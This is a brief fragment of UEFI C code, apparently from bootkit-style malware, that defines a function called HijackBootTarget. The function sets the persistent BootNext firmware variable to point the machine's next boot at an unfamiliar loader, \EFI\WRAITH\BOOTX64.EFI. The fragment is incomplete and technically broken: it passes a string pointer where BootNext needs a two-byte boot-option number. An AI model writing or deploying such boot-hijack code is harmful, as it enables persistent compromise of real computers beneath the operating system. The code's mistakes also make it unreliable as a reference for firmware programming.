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EFI_STATUS HijackBootTarget(EFI_SYSTEM_TABLE *SystemTable)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CHAR16 *NewBootPath = L"\\EFI\\WRAITH\\BOOTX64.EFI";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Simulate NVRAM variable set or use EFI_LOAD_OPTION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SystemTable-&gt;RuntimeServices-&gt;SetVariable(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L"BootNext",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&amp;gEfiGlobalVariableGuid,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EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS,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sizeof(UINT16),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(VOID *)&amp;NewBootPath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EFI_SUCCESS;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